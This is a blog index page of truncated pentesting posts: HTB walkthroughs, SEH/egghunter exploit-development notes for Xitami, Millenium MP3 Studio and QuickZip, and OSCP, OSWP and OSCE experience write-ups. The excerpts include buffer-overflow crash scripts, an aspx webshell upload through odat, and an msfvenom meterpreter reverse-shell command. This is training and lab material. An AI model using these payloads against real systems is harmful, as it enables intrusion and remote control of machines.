Nmap SMB Shares Get the file and unzip it SQL credentials found in vbaProject.bin Use Impacket’s mssqlclient scipt to login Try to enable xm_cmdshell but the current user is not privileged Try to steal credentials by calling a fake share on your own server Listen with responder Crack the hash with john Login again as… Continue reading HTB – Querier Walkthrough
Author: admin
Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter
Fuzzing get HTTP request GET / HTTP/1.1Host: 192.168.1.9User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMTCache-Control: max-age=0 Create a fuzzing script with boo-gen using HTTP requestpython boo-gen.py get.txtVulnerable:If-Modified-Since: Wed, <fuzzing-payload> s_string(“If-Modified-Since: Sat,”, name=”If-Modified-Since”, fuzzable = False)s_delim(” “, name=”space-10”, fuzzable = False)s_string(“15 Jun 2019 01:36:09… Continue reading Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter
Exploit Development: Millenium MP3 Studio – SEH (WinDBG)
Crash #!/usr/bin/pythonfile = “kalisa.mpf”buffer = “http://” + “A” * 5000f = open(file,’w’)f.write(buffer)f.close() Offset #!/usr/bin/pythonfile = “kalisa.mpf”buffer = “http://” + “A”*4105+”B”* 4+”C”*1000f = open(file,’w’)f.write(buffer)f.close() pop -pop -ret Stack nseh (4 bytes) seh (4 bytes) other (4 bytes) other (4 bytes) other (4 bytes) other(4 bytes) hole (4 bytes) other (4 bytes) shellcode starts here So “jmp… Continue reading Exploit Development: Millenium MP3 Studio – SEH (WinDBG)
HTB: Silo
Enumeration nmap SID Enumeration Password Guesser – odat Uploading aspx shell for command inejction ./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger –putFile ‘C:\inetpub\wwwroot\’ ‘shell.aspx’ /usr/share/webshells/aspx/cmdasp.aspx –sysdba Reverse Shell Or create msfvenom payload for reverse shellmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > lisa.aspx Upload the file./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U… Continue reading HTB: Silo
SEH + Egghunter QuickZip Exploit
Initial Script #!/usr/bin/pythonheader_1 = (“\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″”\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00”)header_2 = (“\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″”\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00″”\x24\x00\x00\x00\x00\x00\x00\x00”)header_3 = (“\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00″”\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00”)payload = “A” * 4064payload += “.txt”exploit = header_1 + payload + header_2 + payload + header_3myfile = open(‘kalisa.zip’,’w’);myfile.write(exploit);myfile.close() Crash Open the zip file, attach immunity, try to extract (where the crash happens) Offset SEH Chain After Shift + F9 Seh chain again Offset EIP Control POP-POP-RET… Continue reading SEH + Egghunter QuickZip Exploit
My OSCE Experience
Hi guys,After OSCP and OSWP, I finally got my OSCE certification also. I’m continuing with my personal plan to complete all Offsec certs and just got another beast! As always, I wanted to share my experience and personal studies for OSCE.Status Before OSCE: I was capable of exploiting Basic Buffer overflows and had a solid understanding… Continue reading My OSCE Experience
OSWP – Second OffSec Certificate of 2019
Hi all,I’ve written my OSCP journey before and it seems like it helped many people to find their way. So I’ve decided to write a blogpost on OSWP, too. Intro: I’ve registered for OSWP course on 23 July. Before I register I bought necessary devices which was exactly the ones from Offensive Security Website. Since… Continue reading OSWP – Second OffSec Certificate of 2019
Finally OSCP – May the force be with you!
Since I’ve passed my OSCP exam last week in my 1st attempt, I thought it’d good to share my experiences and help others who ask for a roadmap. I’ll try to include as many resources as I can: My Background: I’ve worked as a web pentester for one year. Then I’ve decided to learn other… Continue reading Finally OSCP – May the force be with you!